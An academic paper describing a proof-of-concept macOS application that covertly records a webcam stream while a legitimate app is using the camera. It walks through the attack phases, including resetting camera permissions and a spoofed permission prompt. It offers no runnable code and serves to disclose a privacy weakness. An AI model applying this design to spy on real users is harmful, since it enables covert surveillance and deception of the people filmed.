You are on page 1of 14

One Light, One App: Tackling A Common

Misperception Causing Breach of User Privacy

Efi Siapiti, Ioanna Dionysiou [0000−0002−7274−5269] , and Harald


Gjermundrød [0000−0003−1421−5945]

Department of Computer Science


School of Sciences and Engineering
University of Nicosia, Nicosia, Cyprus
{siapiti, dionysiou.i, gjermundrod.h}@unic.ac.cy

Abstract. Built-in and computer-connected web cameras can be hacked with


malware that aim in activating the camera without setting on the green led indicator
(in systems that support this feature). A simple countermeasure to at least preserve
the user privacy, until the security incident is contained, is to cover the camera
up when not in use. One could also argue that there is a sense of security when
an application (e.g. zoom, WebEx, Skype) is using the web camera and the light
is on. The user trusts that there is one-to-one relationship between the web-
camera (and its light indicator) and an application. In this paper, we tackle this
common misperception by demonstrating that the aforementioned relationship
could be one-to-many, allowing many applications accessing the web camera
stream simultaneously, posing a serious privacy threat that could go undetected.

Keywords: Privacy · Simultaneous Access · Web camera · macOS

1 Introduction
One could argue that a user is not entirely oblivious to the fact that cybercriminals could
spy on us through the web-cameras. Numerous articles, news reports, even posts on social
media, communicate to the general public that there is a risk of unauthorized access to
the web-camera, either built-in or externally connected, that could be gained without
turning the camera light on (in systems that support this feature). This is undoubtedly
troublesome as the camera light is viewed as a privacy safeguard, notifying the user
that data is being collected. In order to preserve one’s privacy from this threat a variety
of countermeasures are deployed, ranging from simple solutions such as dark-colored
tape and sticky notes to more sophisticated accessories such as sliding camera covers.
Needless to say, these approaches do not address the cause of the privacy compromise
(i.e. detect and/or recover from the malware deployment); they merely provide, at some
level, guarantees for the user privacy.
Suppose we were to formulate the user perception of the web-camera with regards
to his/her privacy (see table 1) . We claim that this perception is linked to the technical
background of the user. A user with no technical background is likely to only think
about the concept of on and off; presumes that the web camera is on as long as the
application that is using it is active and off otherwise. The camera is viewed as an
2 E. Siapiti et al.

integral part of the application and subsequently its overall functionality. A user with
no technical knowledge but informed on security threats could consider the possibility
of unwanted surveillance via malware installed on his/her machine, something that
compromises his/her privacy. On the other hand, technically-oriented users are aware of
the surveillance threat and its impact on privacy.

Table 1. User Perception of his/her Privacy related to a Computer Web Camera

User Profile Perception


No technical background no privacy concerns
No technical background, but security-informed privacy compromise possible via unauthorized access

This paper addresses the common misperception of a mutex-based camera by demon-


strating that the aforementioned relationship could be one-to-many. Consider the macOS
operating system and its camera access policy. Its current configuration allows for simul-
taneous access of the camera resource by multiple processes originating from different
programs. For example, whilst a web browser is accessing the camera stream, a video
chat service may request and be granted access to the same stream. Table 2 displays the
findings of a simple experiment conducted to investigate the simultaneous access policy
to the camera resource in various operating system environments. Six applications that
required the use of camera started execution in a sequential order. It was observed that
for macOS and Windows operating systems, all six applications were granted access to
the camera stream simultaneously. iOS and Android systems locked the camera resource
when used by an application that had access to it, denying access requests to the camera
resource until it was released by the application.

Table 2. Operating Systems Simultaneous Camera Access Policy

Operating System Simultaneous Camera Access Documented


macOS, versions 11.0 - 12.1 (Intel CPU) yes yes
macOS, version 12.1 (M1 CPU) yes yes
Windows 10, version 20H2 yes not explicitly mentioned
iOS no yes
Android no yes

The camera led light acting as a privacy measure is only meaningful in the case of
exclusive camera access by applications, a policy enforced in the iOS operating system.
The simultaneous access to the camera stream poses a privacy threat yielding to either
accidental or deliberate breach of privacy. In the former case, one could be caught in a
One Light, One App 3

hot camera1 situation (similar to hot mic) whereas in the latter the camera stream could
be unauthorized accessed and stored for a later replay by a malicious agent. The privacy
threat that stems from allowing simultaneous access to the camera stream is further
amplified by the absence of visible notifications informing the user that a new process is
granted access to the camera feed. The default access control notification pops up only
the first time when an application attempts access to the camera, essentially asking the
user to grant access to the camera resource. Once the access control privilege is set, any
new processes spawned for running the application are assigned the access right without
informing the user about it. Figure 1 shows the expanded control center on macOS
obtained during the experiment, listing the applications currently using the microphone
but omitting details for the camera resource.

Fig. 1. Control Center in macOS BigSur

The objective of this paper is to demonstrate the breach of privacy caused by the
simultaneous camera resource access. Thus, the paper contributions are twofold:
– Implementation of a proof-of-concept application that eavesdrops and stores the
camera stream currently accessed by a legitimate application, causing privacy inci-
dent. To be more specific, an application is implemented using Swift v.5 that detects
when the camera is currently used by a legitimate application, requests and gets
granted camera access as well, and stores the camera stream in a file that could be
replayed at a later stage. The application detects when the legitimate application
halts its camera access and does the same as not to be detected.
– Demonstration that current notification policies are not adequate to protect the
average user privacy. It will be shown that the eavesdropping application does not
appear on the control center due to the fact that it does not use the microphone.
The rest of the paper is organized as follows: Section 2 gives a brief overview
of privacy issues related to the use of cameras. Section 3 discusses the design and
implementation details of the eavesdropping application. Experiments are presented in
Section 4. Section 5 concludes the paper.
1The camera is on but the user is unaware of it. As an example, consider having a multi-user
Zoom meeting where one participant needs to leave the meeting. Instead of leaving the meeting,
the user minimizes the window and starts his/her next Webex meeting. Both applications have
access to the camera feed.
4 E. Siapiti et al.

2 Camera-Related Privacy Issues and Challenges


Traditionally, the privacy concerns related to the data collected by cameras focused
on surveillance cameras. Private organizations use surveillance cameras for physical
security, organizational, and/or operational reasons. Several live-feed cameras located
inside and also outside the premises capture and store everything within their view.
Needless to say, the collected data includes sensitive information like license plates
of cars, identification cards of customers, patient files in hospitals, personal financial
information in banks, to just name a few [10]. Clearly, there is an elevated risk for
violating the privacy of individuals who did not give their consent to the collection of
data involving them.
Similarly, using a mobile device to take a picture in a public place could also pose a
threat to one’s privacy. Not only it is common to take publicly a personal photo or a video
that also contains bystanders who did not consent to be included in that picture/video,
but quite often these photos/videos are posted on social media and made public [4].
With the use of a simple facial recognition software, which is easy to obtain, one could
track an individual’s whereabouts by performing a scan on publicly available photos.
The above privacy concerns are related to the breach of user privacy based on
the actual photo/video content and could be alleviated with machine-learning based
countermeasures, such as automatic obfuscation of sensitive information and bystanders
[10, 4, 6]. In the case of sensitive information, a running list of items considered to be
sensitive is maintained. Using object recognition technology, those items are identified
in the live feed and obfuscated [10]. In the case of bystanders, the identification of who
is the target of the picture and who is the bystander is done by either training a model
with already existing images, or with mathematical evaluation of parameters like where
an individual’s head is turned, and how close an individual is to the camera. The people
who are deemed to be bystanders by the software, have their faces obfuscated to preserve
their privacy [4, 6]. A complicating factor in the deployment of the above solutions is
the need to have access to a large number of training data, including a plethora of images
of personal information and faces.
User privacy could also be violated if one could correlate a photo/video to a specific
camera using the photo response non-uniformity (PRNU) fingerprint. The privacy threat
is related to how the contents were rendered rather than the contents themselves. PRNU
fingerprints are caused from imperfections in the image sensors, something that is
unavoidable due to the camera manufacture process. To be more specific, imperfections
are created due to the different light sensitivity of each individual pixel, making the
photos taken by a specific camera traceable to the specific camera they were taken
from. This method of identification is also applicable to videos generated by web
cameras [7]. In this case, the fingerprint is extracted by having several pictures taken
by a specific camera, collecting noise parameters, and using a mathematical formula to
derive the camera-specific fingerprint. As a matter of fact, this is a technique used by
law enforcement to identify perpetrators for serious crimes such as child pornography
and terrorist propaganda.
The privacy threats are similar to those of biometric identification. There is the risk of
unauthorized disclosure of the PRNU fingerprint. If any PRNU fingerprint is leaked, even
an anonymous one, it could be matched to the PRNU fingerprints of publicly available
One Light, One App 5

photos on social media. It is trivial to determine the fingerprint as only a couple of photos
are required to get a good estimate of the camera fingerprint. As aforementioned, this
is a technique used in serious crimes where a fingerprint could be matched to several
potential suspects (biometric identification is not a binary operation). Unauthorized
disclosure of the suspect list would undoubtedly have serious life altering implications
to the innocent ones [8]. Furthermore, a malicious individual could determine one’s
camera fingerprint from images posted on his/her social media accounts, superimpose
it into images with incriminating material, essentially framing an innocent person for
these criminal activities [5].
Several approaches were suggested to overcome the privacy concerns that the PRNU
fingerprint poses. One rather straightforward approach is encrypting both the fingerprint
and the noise. The computation of the fingerprint is done in unencrypted form but
in a trusted environment, then saved in an e-PRNU form (encrypted) that can only
be accessed by authorized users having the appropriate decryption key. A significant
overhead due to the encryption process and the key management [8] is added, and as a
result hybrid solutions of keeping part of the data unencrypted and adding equalization
(a mathematical model) to prevent leakages were also proposed [9].
Rather than focusing on the confidentiality of the PRNU fingerprint, other solutions
targeted its integrity. This is a countermeasure to forging the PRNU of a photo and
incriminating an innocent individual. This is the triangle test where the victim cross
checks and identifies the images that were forged using the original images and thus
proving his/her innocence [5].

3 Eavesdropping Application Design and Implementation Specifics

The privacy issues described in Section 2 are linked to the disclosure of one’s iden-
tity without his/her consent. There are also privacy compromises that do not target an
individual’s identity but his/her actions. Consider the virtual meetings. The confiden-
tiality of a virtual meeting is taken for granted as end-to-end encryption is used among
the participating parties, providing guarantees that eavesdropping the communication
stream is not feasible. This is partially accurate; it is indeed impractical to hijack a secure
connection and in-transit flow. However, locally this is possible.
The web-camera is a shared resource to an operating system, with all its implications.
Popular operating systems allow multiple access to resources to support multi-tasking
and multi-user environments. The trade-off though, in the case of the web-camera, is
at the expense of privacy, as it will be demonstrated. An eavesdropping application,
once it is granted access to the web camera, can proceed with accessing the camera
feed without any further explicit authorization. It is highly unlikely that a user with no
technical background would detect that his/her current virtual meeting is eavesdropped
by another application running locally.
In this section, the design and implementation details of an eavesdropping applica-
tion, which monitors in real time the camera stream used by a legitimate application
and replays it a later time, are given. Detailed information about the application can be
found in [11].
6 E. Siapiti et al.

3.1 Eavesdropping Application Overview

Figure 2 illustrates the dataflow diagram of the developed application. As shown, the
external entities are the user, who initiates the functions to start, the authorization center
in the macOS, and the physical camera. The data storage is the folder that stores all the
captured streams. For brevity reasons, the functions included are the ones considered to
be the primary building blocks of the application framework. CameraOn() is a function
that runs in a loop and detects if the camera is on or not. findCamId() retrieves the
camera ID assigned to the camera by the operating system. If the status of the camera
resource is set to on the setupStartCamera() function is called that creates two objects:
AVCaptureSession and AVCaptureMovieFile. The former is used to initiate a session
with the camera and access the camera stream. The latter is used to create a file and
copy the stream in that file. When the camera status is detected to be off, both objects
are deleted and setupStartCamera() terminates. Last, but not least, resetAuthorization
uses CLI to reset all camera authorizations. This is done in order to grant camera access
rights to the eavesdropping application. More details on this are given below.

Fig. 2. Dataflow Diagram of the Eavesdropping Application

3.2 API Library Details

The application development framework is based on two media libraries: CoreMediaIO


and AVFoundation.
One Light, One App 7

CoreMediaIO2 is a low-level C-based framework that publishes the Device Abstrac-


tion Layer (DAL) plug-in API. It allows access to media hardware through a kernel
extension (KEXT), capture video, and capture audio with video[1]. The application uti-
lizes CMIOObjectPropertyAddress to find the address of the physical camera and uses
one of its parameters (the property selector) as input to the the kCMIOHardwareProp-
ertyDevices to determine that a physical device is the target. CMIOObjectGetProperty-
DataSize and CMIOObjectGetPropertyData are queries on CMIOObjects (e.g. camera
resource) to detect data passing through it. The response for both queries is an OS status
indicating success or failure.
AVFoundation is a high-level framework that manages audio and visual information,
controls device cameras, processes audio and video, and is used to configure sessions
with both audio files and video files. The specific subsystem of AVFoundation that was
used is the capture subsystem that allows users to customize and build camera interfaces
for photos and videos. Additionally, it gives users control over the camera capture to
adjust the focus, exposure, and/or stabilization. Another important feature is the direct
access to audio data streaming from a capture device, something that is utilized by the
application to access the camera stream and store it to a file [2]. To be more specific,
AVCaptureSession is the object that establishes the connection with the camera and
manages capture activity and data flow from camera input devices or audio input de-
vices to output such as a file or a window. The particular object has a central role in
the eavesdropping application as it is the means to establish connection to the camera
and proceed with unauthorized access to the camera stream. Another object used is the
AVCaptureDevice, an object for a device that supports input, video or audio. It is used
in capture sessions and offers controls for software specific features of capture. AVCap-
tureDeviceInput defines the specific input from any capture device to a capture session
whereas AVCaptureMovieFileOutput is a captured output that specifically records video
or audio in a QuickTime media video file.
An auxiliary library used by the application is the RunLoop[3]. A RunLoop object
behaves as an event manager, has inputs for sources like window system, port objects
and mouse or keyboard events. This object also processes timer events. Each thread has
its own RunLoop object and thus it is not thread-safe. However, if the RunLoop object
was not implemented, the changes in the camera would not have been detected after
each loop. It is also used as a timer to implement delays after each loop.

3.3 Implementation Challenges


Two main challenges were encountered during the development of the application.
The first one was detecting when the legitimate stream was turned off. The issue was
experienced due to the fact that when the camera is detected to be on (i.e. used by
a legitimate application), the eavesdropping application establishes connection to the
camera itself. Thus, even though the legitimate application terminates, the camera status
is still detected as on.

2There is little documentation on this framework, which is possibly due to the fact that this is
a low-level framework. There is however no indication that this library is deprecated.
8 E. Siapiti et al.

The first attempt to fix the problem was to have the eavesdropping application
pausing its connection to the camera stream after a predefined time interval, checking
if the camera was still on, and resuming the connection to the stream if the camera was
on or stopping it if the camera was off. This approach was not successful as pausing the
connection does not release the resource; it just stops the recording to the output file.
Thus, the camera is still in an active status.
This observation led to the second approach that resolved the issue. When the camera
is detected as on, a new session is created, a new file is created and the stream is saved
in that file. After a predefined time interval, the capture session is terminated and the
camera status is inquired. An on status will only be returned if it is still used by the
legitimate application. In the case of a positive status, a new session is established and a
new file is created. The files are numbered in an incremental order. Once the camera is
detected as off, no further session is established. A few-seconds delay could be observed,
i.e the legitimate application was terminated but the capturing of the camera stream still
continues until the eavesdropping application detects the off status of the camera. The
application keeps checking periodically the camera status to start capturing the next
legitimate camera stream. All the files created for a specific camera stream could be
assembled together to reconstruct the original stream, with short gaps at regular intervals
due to the time switching between terminating the session and reinitiating a new one.
It is worth noting that the time delay variables could be adjusted depending on the
balance between the timing accuracy in starting/ending the stream capturing and the
acceptable amount of loss of stream. A longer delay would mean less loss of stream but
worse accuracy in starting/ending the stream, whereas shorter delay entails a very good
accuracy, but more seconds lost from the stream.
The second challenge encountered was the fact that the eavesdropping application
does not operate correctly on a MacBook with an M1 processor and macOS Big Sur
(Version 11); the result of the queries that detect if the camera is on or off is always true.
It is believed that this was due to a bug in the used framework, as the application works
as expected under macOS Monterey (version 12) when using the same MacBook with
the M1 processor.

4 Experimental Analysis and Findings


The experimental objectives were twofold: (a) demonstrate the workflow of an attack that
compromises the victim’s privacy using the developed eavesdropping application and
(b) assess the performance of the eavesdropping application in terms of CPU, memory,
and disk usage and compare it against the legitimate application’s performance to deduce
any discrepancies that could alert the victim to suspect the unauthorized access to the
camera. The experiment configuration settings are as follows: 2015 MacBook air (1.6
GHz Dual Core Inter Core i5, with 8 GB of RAM) running macOS Big Sur (version
11.5.1).

4.1 Attack Workflow


Without any loss of generality, it is assumed that the malicious payload is already
downloaded on the victim’s system and the user (attacker) had established remote
One Light, One App 9

Fig. 3. Attack Timeline and Phases

access to it. The attack timeline is shown in Figure 3 and details of the attack phases are
given below.

Pre-Attack Phase 0: Preparing the Notification Window The goal of the pre-attack
Phase 0 and Attack Phase 1 is to assign camera access rights to the eavesdropping
application. This is accomplished by manipulating the victim into clicking the pop-
up notification window asking permission to access the camera by the eavesdropping
application. Thus, prior the attack, the eavesdropping application file is renamed to
resemble the legitimate application and the description of the access control notification
is also changed to be the exact same as the one observed for the legitimate application (see
Figure 4). The notification text is partly modifiable and can be changed to impersonate
another application that is not malicious. One could even change the application name
and the icon to completely impersonate a legitimate app.

Fig. 4. Modifiable Notification Description

Attack Phase 1: Resetting Camera Access Authorizations Once the eavesdropping


application is initiated, the first step is to reset all authorizations to the camera resource.
This is a social engineering attack step; Resetting the authorization to the camera for
all applications will require all applications to explicitly request camera access from the
user again. The OS does indeed provide the necessary API to reset the permissions for
all applications via a single function call.

Attack Phase 2: Establishing Connection to Legitimate Camera Stream The cam-


era detection sequence is initiated next, which checks whether or not the camera is on
(i.e. used by the legitimate application). Once the victim starts a legitimate applica-
tion that needs access to the camera resource, the authorization notification pops-up
(Figure 5) because of the social engineering attack performed in Phase 1. Granting the
10 E. Siapiti et al.

Fig. 5. Legitimate Application Authorization Notification

access results in activating the camera, something that is detected by the eavesdropping
application. An opportunity window is created to assign camera access rights to the
eavesdropping application by displaying an almost identical authorization notification
(Figure 6). The second notification is displayed just one second after the first one. Due to
the similarities, it is anticipated that the average user will click on the second notification,
thus granting authorization to the camera resource.

Fig. 6. Eavesdropping Application Authorization Notification

Attack Phases 3 and 4: Capturing Camera Stream and Terminating Connection


After the successful outcome of Attack Phase 2, the eavesdropping application captures
the camera stream and copies it to multiple output files. These output files are sequentially
One Light, One App 11

numbered in the format of session x, file y.mov where x,y =1,2,3, and so on. The session
number is increased by one every time the camera is detected as off. This is done to
facilitate the concatenation of the files that reconstruct the original stream at a later
stage.
When the legitimate application stops accessing the camera, the eavesdropping
application also immediately (within few seconds) let go of the stream as well and thus
the victim is not alarmed. It is worth noting that the application does not appear on the
control center due to the fact that it does not use the microphone (see Figure 7).

Fig. 7. Eavesdropping Application Not Appearing on the Control Center

4.2 Experimental Findings


Performance Metrics It was observed that the overall resource usage of the eaves-
dropping application was lower than the one of the legitimate application (Figure 8 and
Figure 9 respectively). Thus, it could be asserted that the victim will not be alerted to
the privacy compromise incident as the resource consumption is not significant.
More specifically, the values for the eavesdropping application were fluctuating due
to time switching between the connection and the termination of the camera stream. The
CPU usage was in the range 0% to 13%, the memory increased from 17 MB to 23.4 MB
and the disk usage was in the range 0 to 396 KB/s. On the other hand, the values for the
legitimate application were stable. The CPU usage was around 35%-50%, the memory
at 110.7 MB and the disk at 340 KB. The average approximate values are summarized
in Table 3.

Fidelity of the Captured Stream As it was mentioned earlier, in order for the eaves-
dropping application to go unnoticed by the end-user, it must release access to the
camera at regular intervals. This is done to check if the legitimate application has ended
its usage of the camera. A short interval entails that the fidelity of the captured stream
will be low, however the camera will stay on for a very short time (high accuracy) after
12 E. Siapiti et al.

Fig. 8. Eavesdropping Application Resource Usage

Fig. 9. Legitimate Application Resource Usage

the legitimate application released its access to the camera. On the other hand, a long
interval will increase the fidelity of the captured stream at the cost of having the camera
be on for a longer time (low accuracy) after the legitimate application has ended.
Thus, there is a compromise to be considered between the required fidelity of the
captured stream vs. the time interval that the camera still remains on once the legitimate
application releases its access to the camera. If the time interval is long, that increases the
risk that user may suspect the privacy breach. However, the usefulness of the captured
stream depends on its fidelity (i.e. fewer gaps in the recording result in a higher-quality
video). Configuring the accuracy depends on the usage scenario.
An experiment was conducted in order to benchmark the fidelity of the captured
stream with varying accuracy levels. The findings could be used as guidelines for setting
the minimum accuracy value that yields the desired fidelity of the captured stream.
The experiment was based on having a legitimate application using the camera for
120 seconds. Five different runs were conducted, where in each run the eavesdropping
application was using the accuracy values of 2 seconds, 5 seconds, 10 seconds, 20
seconds, and 30 seconds respectively. The results are summarized in Table 4. As it can
be seen, very high accuracy approximately captures 12 % of the video stream while at
a very relaxed accuracy of 30 seconds approximately 93 % of the stream is captured.
Furthermore, there is a substantial delay in restarting the recording as well a high
variance in the restart delay recorded for these specific experience. This delay can be
attributed to the releasing of a resource (i.e. the camera) and then determining if the
camera is still in use followed by a request to access the camera resource again. As each
deployment scenario will have different requirements (both with respect to accuracy and
fidelity) any general recommendation is difficult to recommend. However, as this is a
proof-of-concept application, better approaches are possible and will be investigated as
future work.
One Light, One App 13

Table 3. Resource Usage By Legitimate and Eavesdropping Applications

CPU Usage Memory Usage Disk Usage


Eavesdropping app 6.5% 20.5 MB 185 KB/s
Legitimate app 42% 110 MB 340 KB/s

Table 4. Accuracy and Stream Loss Correlation

2 seconds 5 seconds 10 seconds 20 seconds 30 seconds


Seconds Reconstructed 13 43 84 109 112
Seconds Lost 107 77 36 11 8
Video files created 30 12 9 5 4
Avg. delay to restart capture 3.7 2.8 4.5 7 2.7

5 Concluding Remarks and Future Directions

User privacy in a distributed collaborative networked environment has been given more
attention the last few years. The privacy policy of the European Commission related to
personal data protection (widely known as the GDPR), the support of private browsing
mode as well as privacy policies in popular social networking media are initiatives that
aim in cultivating a privacy culture not just at the work place but in all aspects of one’s
life. The unprecedented hike in the video conferencing due to the exponential growth
of remote working and teaching forced users to reconsider their privacy during virtual
meetings. Background blurring features using proximity and movement as classifiers of
what should be blurred and disabling the video stream if it is not required are measures
taken by the participants to protect their privacy.
One could claim that a user without technical background, when it comes to the web
camera, mainly associates his/her privacy with the data collected by the camera resource.
The user most likely is unaware of the fact that in certain systems multiple applications
could access the camera stream, giving him/her a false sense of privacy. A camera is
considered to be a resource to an operating system, similar to files, disks, and printers,
to just name a few. Simultaneous access is permitted, especially for read-only access,
allowing concurrent sharing of system resources among users or processes acting on
behalf of users.
In this paper, an application that eavesdrops and stores the camera stream currently
accessed by a legitimate application was presented. The experimental findings demon-
strated that the eavesdropping application does not consume system resources at a rate
that the user will be alerted to the privacy incident.
A thorough investigation is currently underway for other desktop operating systems
like Microsoft Windows (different versions will be evaluated) and different GNU/Linux
distributions. This comprehensive view could allow us to determine whether this is a
platform-dependent feature or a multiplatform one. Regarding future directions, there
are several enhancements that could leverage the functionality of the current application.
First, there are extensions to the application that could be integrated, such as microphone
14 E. Siapiti et al.

audio capturing. Second, devising a more effective way of detecting when the legitimate
camera application is releasing the camera, as this will greatly improve the quality of
the captured stream and minimize the probability that the victim will become suspicious
as the eavesdropping application will release the camera almost immediately. Third, lab
experiments could be conducted with users to assess the user awareness/realization of
the privacy incident while varying the accuracy levels.

References
1. Apple: Mac technology overview (2015), https://developer.apple.com/library/archive/
documentation/MacOSX/Conceptual/OSX_Technology_Overview/
SystemTechnology/SystemTechnology.html, [ONLINE], Last accessed: January 20, 2022
2. Apple: Documentation of avfoundation (2022), https://developer.apple.com/documentation/
avfoundation, [ONLINE], Last accessed: January 20, 2022
3. Apple: Documentation of runloop (2022), https://developer.apple.com/documentation/
foundation/runloop/, [ONLINE], Last accessed: January 20, 2022
4. Darling, D., Li, A., Li, Q.: Identification of subjects and bystanders in photos with feature-
based machine learning. In: IEEE INFOCOM 2019 - IEEE Conference on Computer Com-
munications Workshops (INFOCOM WKSHPS). pp. 1–6 (2019)
5. Goljan, M., Fridrich, J., Chen, M.: Defending against fingerprint-copy attack in sensor-based
camera identification. IEEE Transactions on Information Forensics and Security 6(1), 227–
236 (2011). https://doi.org/10.1109/TIFS.2010.2099220
6. Li, A.: Privacy-Preserving Photo Taking and Accessing for Mobile Phones. Ph.D. thesis,
University of Arkansas (August 2018). https://doi.org/10.13140/RG.2.2.28953.88166
7. Martin-Rodriguez, F.: Prnu based source camera identification for webcam videos (2021)
8. Mohanty, M., Zhang, M., Asghar, M., Russello, G.: e-prnu: Encrypted domain prnu-based
camera attribution for preserving privacy. IEEE Transactions on Dependable and Secure
Computing 18(01), 426–437 (jan 2021). https://doi.org/10.1109/TDSC.2019.2892448
9. Pérez-González, F., Fernández-Menduiña, S.: Prnu-leaks: facts and remedies. In:
2020 28th European Signal Processing Conference (EUSIPCO). pp. 720–724 (2021).
https://doi.org/10.23919/Eusipco47968.2020.9287451
10. Ramajayam, G., Sun, T., Tan, C.C., Luo, L., Ling, H.: Deep learning approach pro-
tecting privacy in camera-based critical applications. CoRR abs/2110.01676 (2021),
https://arxiv.org/abs/2110.01676
11. Siapiti, E.: Camera privacy analysis. Tech. rep., University of Nicosia (February 2022), BSc
Final Year Project

You might also like